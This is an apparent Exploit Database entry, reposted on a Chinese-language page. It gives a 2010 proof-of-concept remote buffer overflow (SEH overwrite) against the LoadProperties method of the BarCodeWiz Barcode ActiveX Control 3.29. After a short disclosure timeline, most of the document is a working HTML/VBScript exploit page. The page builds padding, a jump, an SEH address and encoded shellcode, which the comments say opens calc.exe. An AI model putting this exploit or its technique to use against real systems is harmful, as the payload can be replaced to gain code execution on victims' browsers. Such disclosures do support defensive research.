Barcodewiz Barcode ActiveX Control 3.29 – Remote Buffer Overflow (SEH)

• Exploit Database
• 9 阅读

• 作者： loneferret
  日期： 2010-07-30
• 类别：

  • remote
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/14505/

• # BarCodeWiz Barcode ActiveX Control 3.29 BoF (SEH)
  # Bug found: 24th July 2010
  # Author: loneferret
  # Software: http://www.barcodewiz.com/
  # Nods to exploit-db.com
  
  # Vulnerable file BarCodeWiz.dll
  # LoadProperties method
  
  # Tested on: Windows XP Professional SP3 with Internet Explorer 6
  # [Needs adjustment for Internet Explorer 7]
  
   
  # Vendor contacted: 24th July 2010
  # Vendor first reply: 26th July 2010: Wanting more information
  # Vendor contacted: 26th July 2010: Sent 2 proof of concepts files
  # Vendor contacted: 29 July 2010: Asked for update
  # No Response from vendor: 30 July 2010
  # Public Release : 30 July 2010
  
  #
  # Shellcode calc.exe
  # 
  
  ----HTML FILE FROM HERE ON-----
  
  <html>
  <object classid='clsid:CD3B09F1-26FB-41CD-B3F2-E178DFD3BCC6' id='target'></object>
  <script language='vbscript'>
  
  buffer = String(97,"A")
  jmp = unescape("%eb%06%41%41")
  SEH = unescape("%4b%f4%02%10")
  shellcode=unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%4f%49%49%49%49%49%49%51%5a%56%54%58%36%33%30%56%58%34%41%30%42%36")
  shellcode=shellcode+unescape("%48%48%30%42%33%30%42%43%56%58%32%42%44%42%48%34%41%32%41%44%30%41%44%54%42%44%51%42%30%41%44%41")
  shellcode=shellcode+unescape("%56%58%34%5a%38%42%44%4a%4f%4d%4e%4f%4a%4e%46%34%42%30%42%30%42%50%4b%48%45%34%4e%53%4b%48%4e%47")
  shellcode=shellcode+unescape("%45%30%4a%57%41%30%4f%4e%4b%58%4f%34%4a%31%4b%58%4f%35%42%42%41%30%4b%4e%49%54%4b%38%46%33%4b%38")
  shellcode=shellcode+unescape("%41%30%50%4e%41%43%42%4c%49%49%4e%4a%46%38%42%4c%46%37%47%30%41%4c%4c%4c%4d%30%41%50%44%4c%4b%4e")
  shellcode=shellcode+unescape("%46%4f%4b%43%46%35%46%42%46%50%45%47%45%4e%4b%58%4f%45%46%32%41%50%4b%4e%48%36%4b%38%4e%50%4b%54")
  shellcode=shellcode+unescape("%4b%38%4f%35%4e%31%41%30%4b%4e%4b%58%4e%31%4b%38%41%30%4b%4e%49%38%4e%35%46%52%46%50%43%4c%41%33")
  shellcode=shellcode+unescape("%42%4c%46%36%4b%48%42%44%42%53%45%58%42%4c%4a%37%4e%50%4b%38%42%44%4e%50%4b%48%42%47%4e%41%4d%4a")
  shellcode=shellcode+unescape("%4b%48%4a%36%4a%30%4b%4e%49%30%4b%48%42%38%42%4b%42%50%42%50%42%50%4b%38%4a%46%4e%43%4f%35%41%43")
  shellcode=shellcode+unescape("%48%4f%42%46%48%45%49%48%4a%4f%43%48%42%4c%4b%57%42%55%4a%56%42%4f%4c%38%46%50%4f%45%4a%36%4a%49")
  shellcode=shellcode+unescape("%50%4f%4c%48%50%50%47%55%4f%4f%47%4e%43%36%41%56%4e%56%43%56%42%30%5a")
  buffer2 = String(1552, "C")
  
  arg1 = buffer + jmp + SEH + shellcode + buffer2
  
  target.LoadProperties arg1
  
  </script>
  
  Barcodewiz 3.29
  </html>